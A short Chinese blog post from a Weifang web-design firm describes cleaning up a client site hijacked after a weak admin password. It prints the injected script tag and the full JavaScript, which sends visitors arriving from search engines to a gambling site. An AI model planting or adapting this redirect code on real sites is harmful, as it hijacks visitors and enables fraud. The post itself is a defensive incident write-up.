互联网品牌整合服务·为梦想者创造梦想品牌

服务1000+企业,专注企业网站设计 / 网站制作 / 网站优化推广 网站托管服务

了解详情

致力于服务头部企业.打造标杆项目

让每一个作品融入我们的洞察力,创造并呈现精彩 展现您的非凡与不同

了解详情

网站优化 网站搜索排名

潍坊及全国各地区提供搜索引擎优化服务

了解详情

抓一个小黑客的蜘蛛劫持 低端黑客活动

发布时间:2018/10/7 16:36:57 关注:1469



抓一个小黑客的蜘蛛劫持

一个网站前几天被挂了广告代码,经过排查发现是交付后台后,对方没有修改密码,清理了一下,今天发现还有劫持现象

用attrib命令显示了所有可能隐藏的文件,没有发现劫持文件,再排查发现一个文件挂上以下JS 

<script language="javascript" type="text/javascript" src="http://t.cn/Rk85MEq"></script>

http://ap.uuv1.com/js/yy.js

代码如下

if (window.name != 'ad_app6') {var r = document.referrer;r = r.toLowerCase();var aSites = new Array('google.', 'baidu.', 'soso.', 'so.', '360.', 'yahoo.', 'youdao.', 'sogou.', 'gougou.', 'anquan.', 'haosou.', 'bing.', 'sm.', 'wow.', 'souxia.', 'g363.');var b = false;for (i in aSites) {if (r.indexOf(aSites[i]) > 0) {b = true;break}}if (b) {self.location = 'http://www.yuhe.tw/';parent.window.opener.location = "http://www.yuhe.tw/";window.adworkergo = 'ad_app6'}}

判断是不是搜索引擎来源是的话 就劫持跳转到一个台湾“菠菜“网站,一个后台弱口令漏洞引起的小黑客捣乱,安全没有小事情。

  • 上一条:医疗行业网站制作百度搜索相关说明
  • 下一条:Godaddy 如何设置写入权限及启用父目录支持
  • 潍坊网站建设,潍坊网站优化,潍坊网站排名,潍坊网站改版,潍坊网站营销策划,潍坊网站制作,潍坊网站托管,潍坊网站百度排名,潍坊网站培训,潍坊seo培训,潍坊网络公司

    地址:山东省潍坊奎文区新华路乐川街华谊大厦三楼

    网址:http://www.wf168.com/ 垂询电话:

    网站备案:鲁ICP备14027302号-5

    copyright© 潍坊华邦网络有限公司2011-2025